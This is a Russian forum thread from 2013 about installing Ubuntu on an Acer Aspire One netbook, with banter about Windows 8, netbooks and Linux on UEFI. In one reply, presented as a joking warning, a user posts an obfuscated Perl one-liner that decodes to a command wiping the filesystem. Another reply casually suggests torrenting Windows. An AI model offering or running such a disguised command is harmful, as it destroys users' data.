--}}
Новая тема
Вы не можете создавать новые темы.
Т.к. вы неавторизованы на сайте. Пожалуйста назовите себя или зарегистрируйтесь.
Список тем

А я вот Линукс поставил !

Слухи и сплетни
35
153
С друзьями на NN.RU
В социальных сетях
Поделиться
antidot
05.03.2013
А я вот Линукс поставил !

Вороне где-то бг послал Асер Аспире Уан. Ну че еще на него поставить ? Поставил Убунту с менеджером окон Гном и Компизом, еле дышит ! Поменял менеджер на xfce и таперче, стало быть у меня Ксубунту.

Никак не пойму, как там включить "клир тайп" шрифты, навроде тех, что в Гноме были ну и с переключением расладок еще предстоит разобраться. Забавно, что камера и вайфай нашлись автоматом, флешки тоже монтируются без проблем.

Хотя на вид конечно и полный отстой, но для скромных нужд лазания в этих ваших интернетах через вай-фай должно хватить.

Горд собой !
anselm
05.03.2013
гном рулит. компиз в *уй не тарахтел.
у меня на всех компах гном летает, даже на мелком нетбуке n150+ который
antidot
05.03.2013
anselm писал(а)
гном рулит. компиз в *уй не тарахтел. <br> у меня на всех компах гном летает, даже на мелком нетбуке n150+ который ...

Я поотключал все компизы, один хер окошки по две секунды открываются. Пришлось таки перейти на xfce.
7x7
05.03.2013
Лучше бы ты себе клизму поставил.
Купи лицензионный Windows 8 - помоги бедному Биллу.
anselm
05.03.2013
лучше купить клизму и поставить ее Биллу. реальная помощь))
LeChat
06.03.2013
...а ещё лучше клизму из скипидара с патефонными иголками! :))
antidot
05.03.2013
7x7 писал(а)
Лучше бы ты себе клизму поставил. <br> Купи лицензионный Windows 8 - помоги бедному Биллу. ...

Клизму буду ставить, когда оно надо будет.

Виндоус 8... ну туда наверно в перспективе РТ можно будет поставить, хотя тоже не факт. РТ щас только для АРМ, хотя я думаю, политика Интел, отказавшейся от АРМ заставит выпустить и версию для х86.
7x7
05.03.2013
А как ты относишься к новой технологии UMCP-400/17BP на 128-шинной платформе по AFSH - шным каналам без использования ISMS-x333/15.0630.212 протокола?
Я что-то пока в раздумьях. Да и этот новый протокол 4-PIOG-581.45 Pro мне что-то не понятен. Где там 5-й стоповый бит?
antidot
05.03.2013
7x7 писал(а)
А как ты относишься к новой технологии UMCP-400/17BP на 128-шинной платформе по AFSH - шным каналам без использования ISMS-x333/15.0630.212 протокола? <br> Я что-то пока в раздумьях. Да и этот новый протокол 4-PIOG-581.45 Pro мне что-то ...

Никак не отношусь, я и не одного линуксового заклинания набрать без ошибок не в силах. Копи-пастом все из интернетов :)
7x7
05.03.2013
Значит ты мне здесь не советчик. А жаль!
Главное такие заклинания не копируйте:

echo "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
kragl
06.03.2013
7x7 писал(а)
Лучше бы ты себе клизму поставил.
Купи лицензионный Windows 8 - помоги бедному Биллу. ...
Я у соседа видел 8 - ему в магазине семерку обновили до восьмерки, но как я понял он это зря сделал.
Вид как у смартфона, хотя я так понимаю, что функционал как у семерки..., верно...
Они уже вроде выпустили обновление, где вернули назад кнопку "пуск". Вот только я не понял, вернули ли "аэро". Если вернули, то стоит демо-версию посмотреть скачать... если без аэро, нафиг оно нинадо такое убожество.
А то что было - только подследственному на десктоп ставить, в качестве бесчеловечной пытки, чтобы быстрее раскалывался..
kragl
06.03.2013
Я так и не понял в чем фишка восьмерки, которая должна привлечь людей от семерки ..
Я сейчас не помню, но тогда мне показалось. что у 8 ПРО функционал меньше, чем у 7 ПРО...
На планшеты хотели её продвинуть, похоже. Там-то ладно ещё. Однако попытка назвать её "универсальной", и там и там, закончилась, как обычная попытка усидеть между двух стульев...
kokon
06.03.2013
Я вот восьмерку, только мельком видел, и она не впечатлила. Наверное будет как с 7 и вистой. Доведут восьмерку до ума, а появиться удобная 9-ка.
А вообще, имхо, самая стабильная система от мелкомягких, это вин2000 была, хотя семерка тоже радует.
Вроде обещают к концу года нечто под названием Windows Blue, та же восьмёрка, но шизофрения в виде плиток по желанию попрятана, а старые элементы возвращены по большей части на место. А куда им деваться-то, в старом виде это полный провал. А в новом вот поглядим...
Хотя вообще там всё туманно. И по многим другим причинам...
antidot
06.03.2013
Подпольщики писал(а)
Вроде обещают к концу года нечто под названием Windows Blue, та же восьмёрка, но шизофрения в виде плиток по желанию попрятана, а старые элементы возвращены по большей части на место. А куда им деваться-то, в старом виде это полный провал. А ...

Даже в Виндоус 8 РТ можно вызвать классический рабочий стол.
Очень дико сие выглядит на современном планшете. Ну понятно, что в обычной Винде это для приемственности и совместимости сделано, а в РТ-то оно нахера ?
Я планшеты как-то не очень. Только ноуты. На планшете не понабираешь тексты-то. Да и вообще ничего серьёзного не сделаешь. Потому моё отношение к этой их кафельной плитке и аналогичному сортирному дизайну вполне однозначно, и выражается не очень цензурно.
Вы на неё значит вообще не смотрели, если вам так показалось...
- что вам понравилось в виндуз 8?
- реклама!
реклама действительно зачетная )
LeChat
06.03.2013
7x7 писал(а)
Купи лицензионный Windows 8...

аха,аха! :))) вот такой --------------------->
Кстати, очень верно отражает суть нового релиза...
antidot
06.03.2013
LeChat писал(а)
7x7 писал(а) <br> Купи лицензионный Windows 8...
<br> аха,аха! :))) вот такой ---------------------> ...

В линейке продуктов "Виндоус 8" нет "Хоум эдишена".
LeChat
06.03.2013
...а на "деме" значит кетайская подделка!! с ператсково диска! :)))
alex07150
07.03.2013
Заморочки везде есть и у каждого свои! У меня стоят вместе и 7 и UBUNTU. И когда что надо то и открываю ! Просто правильно написано в инструкции - забудьте про Windows! это только мешает торопыгам каким и я являюсь .это самый главный пункт потому что все по другому и читайте с начала ! Ничего по наитию с Windows не сделаешь и время нужно чтобы разобраться .
Если еле дышит, значит, компиз не заработал. С ATI-шными картами компиз не всегда дружит.
antidot
05.03.2013
Публицыст писал(а)
Если еле дышит, значит, компиз не заработал. С ATI-шными картами компиз не всегда дружит. ...

Там 945 чипсет + атом одноядерный на 32 разряда, очень унылая конфигурация железа.
anselm
06.03.2013
у меня исторически симпатия к ати.. всегда все работало. дрова правда ставил проприетарные
Ω
05.03.2013
Т.е. был компьютер, потом ты на него поставил линукс, потом стал его допиливать, потом настраивать, и был страшно рад, что флешки видит? Я теперь понимаю, почему люди эту ось не любят. Как-то через жопу все, прямо как на виндах, только непривычно :-)
antidot
05.03.2013
Ω писал(а)
Т.е. был компьютер

Не компьютер, а нетбук !
и был страшно рад, что флешки видит?

Я был страшно рад, что видит вай-фай. В интернетах пишут - это реально большая проблема. Не видит вай-фай и все тут.

А вот чего с раскладками делать, пока не понял. Без раскладок нн.ру работает только на просмотр - на транслите-то много не попишешь.
Ω
05.03.2013
У меня есть нетбук на атоме 520, с гигом мозгов (делл мини 1010). Тягает семерку стартер, но задумчиво. Зато весь функционал, годный для простого человека, как я, имеется и работает из коробки. От батареи 7 часов с видео и без вайфай.
Он шел с хрюшей, и проблем не было вообще, кроме драйверов для видюхи, которые некорректно аппаратно ускоряли кодеки H.263 на видео 720р (1080р он не тянет совсем). Впрочем, смотреть на нем ХД видео не требуется, так что винды можно было оставить в покое и так. И никакого линукса - и не потому что я хочу начать холивар, а просто непонятно, зачем ставить то, что работает с геморроем? Это тренировка для мозга? Тогда понятно.
ЗЫ. Ось, где непонятно как настраивается интерфейс вплоть до раскладок я вообще даже в руки не взял. Явно сырой продукт. Старое железо нетбука 09 года должно улавливаться ось даже без интернета. Или там дистриб весит 20 мегов и просто места нет?
antidot
05.03.2013
Ω писал(а)
У меня есть нетбук на атоме 520,

Примерно та-же конфигурация. Зачем Линух ставил ? ну нет у меня семерки стартёра, а хотя кой-где бы она мне пригодилась, если-бы была.

ХР на ней стоит параллельно, но постоянно виснет.
Ω
05.03.2013
Что значит нету? Берешь торрент и все. Идеологически против? У меня или фришный софт или пиратский весь. Там все равно надо будет софтом этот дистриб на загрузочную флешку загонять. СДрома-то нет.
Пустая вин7 стартер занимает больше 500 МБ РАМа сразу после старта, и это уже без ненужных служб. Рекомендую все же туда ХР засунуть. Виснуть не должна, я не знаю, может и соседство с линухом ее помяло, или что-то стоит коряво. Уверен, что ХР для этого нетбука была родной осью, хотя сначала нетбуки вроде пытались с минимальным линухом продавать.
Там не хард ССД? Если да, то ХР стоит в режиме AHCI?
antidot
05.03.2013
Ω писал(а)
Там не хард ССД?

Нет, винт выкручивал, вешал на сюсельки и сливал инфу на другой комп. Винт при работе шумит, значит не ССД.
Ω
05.03.2013
да на нем написано было бы. да и видно сразу.
antidot
05.03.2013
Ω писал(а)
да на нем написано было бы. да и видно сразу. ...

Ну значит точно не ССД.
Mvr
05.03.2013
я не удивлюсь, если у тебя SSD зашумит.
Он вроде иногда пищит у кого-то :)... сам не слышал.
Вот чего там может пищать?
Pollux
06.03.2013
Пищит иногда, есть такое.
Хотя кажется даже и у меня иногда пищит. Но на фоне кулеров там фиг разберёшь чего пищит... Обычно что может пищать - трансформаторы да дроссели, но при внешнем осмотре подходящих источников звука не видно хоть тресни, а всё равно что-то пищит...
Pollux
06.03.2013
В системнике, да, кулеры заглушают, в ноуте - слышен и писк и легкое потрескивание. Но только если специально прислушиваться. Просто как-то обратил внимание, при полной тишине.
Был бы один кулер, можно было бы остановить на время и прислушаться. Но их там 5... как-то неохота так над техникой издеваться. :)
Pollux
06.03.2013
Подпольщики писал(а)
Но их там 5...

Очень сурово:)
К счастью, сегодня любую фигню вроде делают с программным управлением режимом вращения, так что пока не погнал графику или перекодировку - очень даже тихо... :) А раньше эти блин кулеры каждый год приходилось менять...
Pollux
06.03.2013
Я сразу вспомнил свой пентиум 4 на прескотте, когда при перекодировке видео, комната гарантировано теплела на несколько градусов:)
Надо было при установке указывать русский язык, всё бы встало автоматически. А сейчас надо смотреть параметры - язык системы и установить русский, потом зайти в параметры - раскладки и настроить удобные параметры.
antidot
05.03.2013
TropicalMedved писал(а)
Надо было при установке указывать русский язык, всё бы встало автоматически. А сейчас надо смотреть параметры - язык системы и установить русский, потом зайти в параметры - раскладки и настроить удобные параметры. ...

там стоит русский язык. Но он чет не везде, рядом со словом условно говоря System может быть надпись "насторойки системы".
antidot
06.03.2013
antidot писал(а)
вот чего с раскладками делать, пока не понял. Без раскладок нн.ру работает только на просмотр - на транслите-то много не попишешь.

Уделал и раскладки.
Я с убунту ещё с 9 версии и она и тогда цепляла вафлю, смотрела фильмы из коробки и т.д. А вот например при подключение бука к ТВ я ипся с xrender. А с видюхой от амд я ипся с дровами. И т.д.
а на винде я ипся с активаторами!

Поэтому у меня теперь Вин 8 лицензия и я не ипусь с компом, а тупо его пользую.:)
Old voron
06.03.2013
Улыбнуло:) Не могу себя заставить поставить 8 ку, при виде их "мега дизайна" хочется ругаться матом.
Хорошая она, но только на современном железе. На старом дрова подглючивают. А дизайн не напрягает.
В вин 98 ПУСК был маленький, в ХР побольше, в вин 7 ещё больше, а в вин 8 просто во весь экран. Но суть та же.:)
Old voron
06.03.2013
Надо попробовать, хотя бы для общего развития. Не знаю почему так бесит этот плиточный дизайн:)
swall0w
05.03.2013
несколько раз пытался установить и настроить freebsd в виртуалке... нихе..а не получилось, временно забросил...
antidot
05.03.2013
А, да ! Я еще Оперу поставил из "деб" пакета.
RoMih
06.03.2013
а в репах нет штоль гоперы?
antidot
06.03.2013
RoMih писал(а)
а в репах нет штоль гоперы? ...

А он потом сказал, что есть, но уже в процессе установки пакета и предложил качнуть из репов.
RoMih
06.03.2013
Прикольно, я когда играл в линух, тоже на нетбуке, только на очень древнем, лет наверное пять назад, оперы не было в репах. Кстати очень шустро арч работал, но там долго и нудно его ставить.
У меня простой и короткий вопрос:
- Зачем ?
antidot
05.03.2013
Marlboro Man писал(а)
У меня простой и короткий вопрос: <br> - Зачем ? ...

Чтоб пользоваться нетбуком. ХР на нем виснет. А че вы хотели ? Атом - это проц, который ХУЖЕ чем Целерон !
Ω
05.03.2013
я ж говорю, надо выяснить что виснет. Мож тупо перегревается. Если идут БСОДы, можно дамп памяти прочитать.
antidot
05.03.2013
Ω писал(а)
я ж говорю, надо выяснить что виснет. Мож тупо перегревается. Если идут БСОДы, можно дамп памяти прочитать. ...

Да ну его нахер. Поюзаю маленько и хозяйке верну, тетке одной. Она не верит, что на нем нельзя иметь ничего путного. Отдам и она будет его хранить.
А нормальные нетбуки бывают?
antidot
05.03.2013
Marlboro Man писал(а)
А нормальные нетбуки бывают? ...

Естественно нет !
AlexKB
08.03.2013
Да ладно. Перед НГ купил в ситилинке нетбук Леново за 6 тыр, с 2 гигами оперативки и с двухъядерный (плюс гипертрединг) Атомом N2600. Установил на него семерку. Нельзя сказать что летает - но и не тормозит, грузится быстро, приложения запускаются тоже нормально. Даже WoW запускал - вполне приемлемо можно играть на минимальном качестве. При этом в режиме веб-серфинга батарея держит 7-8 часов. Вполне устраивает!
Ноуты размером с нетбук нормальные бывают. Но цена немного негуманна.
antidot
06.03.2013
Подпольщики писал(а)
Ноуты размером с нетбук нормальные бывают. Но цена немного негуманна. ...

Совершенно негуманна и тут бы я уже на "Макбуки" начал засматриваться.

ЗЫ: Хотя у меня есть кой-где ноут на АМД Е-2 с Радеоновской какой-то видюшкой, так там все летает, хотя и стоит "Семерка Ультимэйт".
Впрочем, в том году детально препарировал один ультрабук "типа ДНС". Единственный минус - качество экрана не на высшем уровне, не мак, да, а остальная начинка вполне стандартная, проц i5 то ли i7, 4 Gb, ну ещё SSD. Цена там около 20+. Для полноценного ноута размером с лист А4 и толщиной см довольно терпимо, аналогов-то не очень много. Игровой видюхи там не было по понятным причинам, да и не для такого оно нужно.
anselm
06.03.2013
бывают. я себе как купил-сразу 7 неглядя снес и дебиан накатил..
Meg@VaD
06.03.2013
Ультрабуки называются
Old voron
06.03.2013
Нетбуки скоро вымрут как динозавры, их место заняли планшеты.
antidot
06.03.2013
Old voron писал(а)
Нетбуки скоро вымрут как динозавры, их место заняли планшеты. ...

Если ты в интернетах в основном по-текстам угораешь, без клавиатуры - стремно.
на планшете набрать текст длиннее твита - мучение и геморрой, так что вряд ли
Не заняли и не займут.
Планшет - это игрушка для просмотра фильмов и прослушивания музыки, более-менее сложные задачи на нём сделать не получится.
Old voron
06.03.2013
Для более сложных задач есть ноутбуки. Работать на тормозном угребище, на атоме, с маленьким экраном это для любителей извращений.
Нет, это для любителей нормально работать и не таскать с собой тяжелые и громоздкие ноуты.
Old voron
06.03.2013
Не буду спорить, просто у нас разное представление о нормальной работе:) По сути, большинство использовало нетбуки, как теперь планшеты, т.е. брало их в дорогу.
Нет, просто вы не представляете, что можно работать не только в офисе :) Никто не говорит что нетбук это замена стационарного компа, это лишь возможность оперативно включится в работу, если это вдруг потребуется.
Бывают.
antidot писал(а)
Атом - это проц, который ХУЖЕ чем Целерон ! ...

Соленое с пушистым не сравнивайте. Atom - это другой процессор.
Зайдите на ark.intel.com и сравните.
Old voron
06.03.2013
Ставил убунту на нетбук, посмотреть. Посмотрел, поставил xp. На домашний тоже ставил пару раз поиграться, всегда потом сносил:) Понимаю когда линукс на сервера ставят. Но не на домашний комп или нетбук.
anselm
06.03.2013
если админишь сервера, то сложностей нет. а удобнее-факт
+1
asknn
06.03.2013
Как говорят наши специалисты, вот у тебя и появилась полноценная сексуальная жизнь. Будешь с Линуксом заниматься сексом очень часто.
7aladin
06.03.2013
обычно в авторских темах не пишу, но не удержался. пока едешь в автобусе... :-)
antidot
06.03.2013
7aladin писал(а)
обычно в авторских темах не пишу, но не удержался. пока едешь в автобусе... :-) ...

Какая миленькая хрюшка !
7aladin
06.03.2013
Я хотел эту, но думал обидишься :-)

Обычно говорю: "винду ты уже не знаешь, теперь не знаешь линукс"
antidot
06.03.2013
7aladin писал(а)
Я хотел эту, но думал обидишься :-) <br> <br> Обычно говорю: "винду ты уже не знаешь, теперь не знаешь линукс" ...

Какие позитивные картинго ! :)
Девушка, а девушка, а как вас зовут? - Таня. - А меня Федя. - Ну и дура.
(с) ДУ :о)
T0ny
06.03.2013
Собственно не вижу причин хвастаться, убунта давно уже стала десктопной системой, работающей из коробки.
ЗЫ Перепробовал множество дистрибьютивов, от мандривы до бэктрэка. Остановился на арче.
Old voron
06.03.2013
Может быть, но например, если ставить на ноут, как минимум функции кнопок Fn пошлют вас далеко, без соответствующих драйверов. Для любителей поиграть тоже не вариант, а таких любителей много. Садомазо варианты типо wine и т.д. в расчет не беру.
Вообщем, не вижу причины создавать себе трудности чтобы их героически преодолевать, непонятно для чего.:)
T0ny
06.03.2013
Про игры написано ниже. Проблем с Fn кнопками не испытывал, хотя и ставил на ноут.
Old voron
06.03.2013
Если вы про steam, то боюсь будет как на маке, steam есть, игр нет:)
T0ny
06.03.2013
Ну рынок игр давно уже на консоли перекочевал.
Old voron
06.03.2013
Скажете тоже:)
Почти любая выходит на PC под виндой. Есть конечно отдельные эксклюзивы, особенно для ps3, но их не так уж много.
T0ny
06.03.2013
Посмотрите график релизов игр. В первую очередь - консоль. Десктоп давно сдает позиции.
Old voron
06.03.2013
Иногда консоль впереди, часто графики совпадают. mmorg на консолях практически нет, со стратегиями тоже беда, star craft2 например. Диабло 3 на pc вышло уже давно, на консолях еще только надумали его выпустить.
Так эти рынки и будут развиваться параллельно, имхо.
anselm
06.03.2013
у меня на двух ноутах дебиан. кнопки fn работают. в одном просто включением опции acpi к ядру, в другом установкой пакета от производителя. чяднт?
Да, кстати, классику-то забыл)))
Хотя когда на нём наконец начнут запускаться игрушки без секса с вайном - школота резко пересмотрит своё мнение, я гарантирую это :)
По слухам - там уже работают над этим.
T0ny
06.03.2013
Steam уже портировали, проснитесь!
Прямо таки уже? Вроде обещали к концу года закончить, и то ограниченно как-то...
Просто не очень понял, что они надумали делать с кучей старых игр там под DirectX.. и как его портировать.
T0ny
06.03.2013
Ну да, пока избранные... CS:GO под линукс вроде не отыскивается... хотя сорс вроде уже готов.
Если со временем станут выпускать одновременно - это будет номер...
Стим портировали!!! УРААА, а игры забыли.:)))))))))))))

с таким скудным количеством игр стим никогда не взлетит в никсах. С годами да, но не в этом году точно.
alex07150
07.03.2013
Да . да . Когда то 100 лет назад бабушки чертыхались глядя на чадящие автомобили - и за чем ? ведь на лошадях лучше ?! и вроде и рисовала не древняя бабушка а уровень развития такой же !
Saradon
06.03.2013
Рунту после винды как-то человечнее воспринимается.
а кто-нибудь знает, линукс научили ставиться на компы с UEFI заместо биоса? полтора года назад я твёрдо решил поставить себе уебунту на домашний комп. достал бубен, накачал пяток разных дистрибов. покамлал с недельку и понял, что нахуй этот линукс.
я не ламер, ну бля буду, не ламер. не вот крутой айтишнег, но никогда не было проблем со сборкой и настройкой компов как себе, так и друзьям.
но когда я начал гуглить, какого геморроя стоит установить линукс на современный комп, я понял, что вхуй это мне не упёрлось. линукс был и остаётся осью для красноглазиков.
Old voron
06.03.2013
Согласен, вроде уже все уже чинно блинно как у винды красиво, но шаг в сторону и опа, опять нужно доставать бубен, править конфиги и фигачить команды на терминале.:)
Old voron писал(а)
но шаг в сторону и опа, опять нужно доставать бубен, править конфиги и фигачить команды на терминале.:) ...

ВОТ!!! Правильно!!! Меня это и напрягает. И ещё напрягает то, ч тоесли у тебя сегодня всё хорошо, это не значит что завтра всё будет так же. (Не считая серверные ос)
AlexKB
08.03.2013
Так и в винде тоже иногда приходится запускать регедит.. считаю, это равноценно редактированию конфигов в консоли.
mogul82
06.03.2013
Установку не осилил а говришь что не ламер.
нет, не осилил. и считаю это проблемой ос, а не своей
mogul82
07.03.2013
Линукс он такой к нему готовиться надо. Иначе ни как.
Old voron
06.03.2013
Ну ставится она действительно уже давно как винда, секас, как правило, начинается потом.
винда ставится с флешки с минимальным вмешательством пользователя за полчаса

можете мне вкратце расписать процесс установки линукса на комп с UEFI?
Old voron
06.03.2013
C UEFI не ставил, может там действительно не все так шоколадно.
вон Публицыст ниже ссылку кинул, почитайте, если интересно
Old voron
06.03.2013
Почитал, правда эта не открылась. Теперь понятно, беда там с сертификатами.
alex07150
07.03.2013
Вот именно ! я в 60 лет UBUNTU поставил . не скажу чтобы это далось легко ! Но в основном из- за инструкций по установке . рассчитаны на подготовленный уровень и пункты там где я спотыкался не были рассписаны. предполагалось что это само собой должен знать . Ну а зачем ? так интересно просто !
Пишут, что ubuntu x64 на UEFI ставится, в отличие от х32. Так что, если памяти хотя б 2, то смысл ставить есть. Кстати говоря, если есть возможность поставить ubuntu x64, то это и надо делать. Но без шаманства с UEFI, похоже, получается не всегда.
https://help.ubuntu.com/community/UEFI
handmade
06.03.2013
поставь вот это - www.mintlinux.ru/catalog/item14.html
antidot
06.03.2013
handmade писал(а)
поставь вот это - www.mintlinux.ru/catalog/item14.html ...

Зачем это ? Я уже поставил Убунту, при загрузке нашел меню, что можно Гном оставить а Компиз отключить. Так и юзаю.
handmade
06.03.2013
хозяин-барин
antidot
06.03.2013
handmade писал(а)
хозяин-барин ...

Даже если в Гноме включить некие вкусности типа, вероятнее всего, Метасити, то все встает вмертвую, зато начинает работать красявый Каиро-Док.
anselm
06.03.2013
метасити это оконный менеджер по сути и он идет по умолчанию. каиро док это нафига?
Это посимпатишнее и поудобнее гнома или нового интерфейса Ubuntu. Привычнее точно. Я тебе обещал скрины показать. Вечерком сделаю.
anselm
06.03.2013
Лучше юнити быть не трудно. Но она для телефоноа пойдет имхо, портируют ж
Вот стоит на KDE.
В целом на Gnome быстрее и удобнее, но чота после апдейта заглючило, пока не разобрался.
На левом мониторе обычный интерфейс KDE, на правом - Cairo в opengl.
antidot
07.03.2013
anselm писал(а)
метасити это оконный менеджер по сути и он идет по умолчанию. каиро док это нафига? ...

Ну у тебяэто все вместе с Каиро-Док становится похоже на Мак-Ось, да и вообще удобная штука.
anselm
07.03.2013
тогда неудобно.. мне мак не нравится
ay
06.03.2013
antidot писал(а)
А я вот Линукс поставил ! <br> <br> Вороне где-то бг послал Асер Аспире Уан. Ну че еще на него поставить ? Поставил Убунту с менеджером окон Гном и Компизом, еле дышит !

убунта последних версий - полное УГ
надо что-то другое ставить (ранние версии или другой вариант линукса)

кстати, версии, основанные на убунте тоже так себе, просто кастрированный вариант исходного УГ
В последнее время в штатах всё популярнее становится Linux Mint, а убунта там не котируется.
ay
06.03.2013
спасибо, посмотрю
но:

ru.wikipedia.org/wiki/Linux_Mint
Так как сборки Linux Mint в большинстве своём отличаются от Ubuntu лишь составом включённых в дистрибутив пакетов, то совместимость с Ubuntu очевидна, что признают и сами разработчики.

слегка смущает этот пункт, т.к. как я уже написал выше:

кстати, версии, основанные на убунте тоже так себе, просто кастрированный вариант исходного УГ

к сожалению, проверить все существующие варианты в тот момент не смог, времени не хватило, но осталось именно такое впечатление
antidot
07.03.2013
ay писал(а)
убунта последних версий - полное УГ

Поясните - почему ?!
ay
07.03.2013
тормозная, жрет слишком много ресурсов - памяти ей надо как висте, если не больше
по моим ощущениям работала не быстрее чем виндус (сравнивал на новом ноутбуке, на котором была установлена семерка с антивирусом, устанавливал убунту на другой раздел)
другой вариант последней версии линукса на древнем ноутбуке работал гораздо быстрее (я про отклик системы, а не что-то еще, типа тестов на производительность железа)
antidot писал(а)
А я вот Линукс поставил!

На комп? Как-то не тянет на достижение...
Я вот понимаю портировать линух на новый PlayStation (и чтобы всё железо поддерживалось) или в микроволновку, а лучше - в автомобильный кампутер что-то вроде S.M.A.R.T. сделать.

Эт я типа подсказываю про "поле непаханное" и куда сил... ум богатырский приложить ;)
Meg@VaD
08.03.2013
ydl есть для ps
а, ps4 вышла, не знал. Значит и для неё скоро будет что-то.
Meg@VaD писал(а)
ydl есть для ps

насколько я знаю linux на PS бесполезен, т.к. нету спеков (а значит и драйверов) к графическому ядру CPU Cell.
alex07150
07.03.2013
Почему еле дышит ? UBUNTU 12.04 или 12.10? Любая должна летать даже самая старая хоть 11.10 ! Разницу заметили? В Windows если комп висит то висит все а в UBUNTU если зависло какое приложение то все остальное прекрасно работает . Если повисло от каких то обновлений то есть ярлык очистка системы .Откройте удалите последнее обновление . обычно помогает . Только что установленная UBUNTU должна летать ! Возможно вы сразу загрузили очень много обновлений ! Нужно было выбирать что нужно вам а что нет . С начала список вываливается и предлагается что можно установить ! Откройте - Главное меню . там список приложений- больше 1000 программ для UBUNTU выбирай что тебе надо .. Устанавливаете программу - сразу ярлык вытаскивайте а то до них добраться долго. они спрятаны. это не WINDOWS!
alex07150 писал(а)
В Windows если комп висит то висит все

Устарели ваши сведения. Лет так на 10 минимум. Особливо если говорить о win x64.
Вот в Linux ежели уж компиз повис (а это не такая уж и редкость), то писец всему. Винда же лечится.
alex07150
07.03.2013
У меня стоит 7-ка 64 - битная и UBUNTU 12.04 32 -битная но с серверным пакетом . видит 6 Г оперативки . Торренты стоят под UBUNTU . под Windows вылетает синий экран хотя бы один раз за ночь да и тяжелая она . А под UBUNTU стоит . на том же самом железе . Не пойму в чем дело память сбоит или WINDOWS кривой сборка .. переустанавливать просто так лень . жду когда Windows совсем накроется .Кстати UBUNTU переустанавливал . обновил не как то не глядя до 12.04 . установилась криво . переустанавливал уже с диска . легла четко . все сохранилось . Блин . даже то что не надо было . запомнились даже настройки на бывшей ОС.
А у меня гном с Сairo и KDE одновременно стоят. Ubuntu 64 12.10.
После последнего апдейта KDE грузится, гном с каиро - нет. При этом гребаный Unity жив, но он мне нафиг не нужен.
alex07150
07.03.2013
У меня UBUNTU раза 3 висела . Если на работе сис . администратор стукает по рукам чтобы не обновляли то там стоит год уже и не на одном компе не висла .А я это дома все обновлял как мазохист просто посмотреть не читая чего и за чем вот и висела . Открывал- очистка системы и удалял до тех пор пока виснуть не переставала .Обычно это не больше 2 патчей . Просто суют в обновление всякое дерьмо недоделанное а люди автоматом обновляют ! Вот вся и причина ! а потом с 64 - битной UBUNTU много программ не доделанных до ума . Так что стоит 32- битная но с серверным патчем .
antidot
08.03.2013
alex07150 писал(а)
Почему еле дышит ? UBUNTU 12.04 или 12.10? Любая должна летать даже самая старая хоть 11.10 ! Разницу заметили? В Windows если комп висит то висит все а в UBUNTU если зависло какое приложение то все остальное прекрасно работает . Если повисло ...

А как там удалять ненужные приложения ?
alex07150
08.03.2013
Нажимаешь на ярлык - очистка системы в меню .Открывается последний установленный патч . Нажимаешь удалить . выходит то чем не пользуешься . закрываешь и снова открываешь. снова открывается следующий установленный перед этим .. Но это когда сразу установил обновления и повисло ... А когда просто что то удалить надо то через терминал ...sudo название программы и удалить . прочитать надо что это за программа и как удаляется ..
Meg@VaD
08.03.2013
apt-get... )))
sudo apt-get... ;)
Meg@VaD
08.03.2013
я и так под #
anselm
08.03.2013
недоговариваешь
Meg@VaD
09.03.2013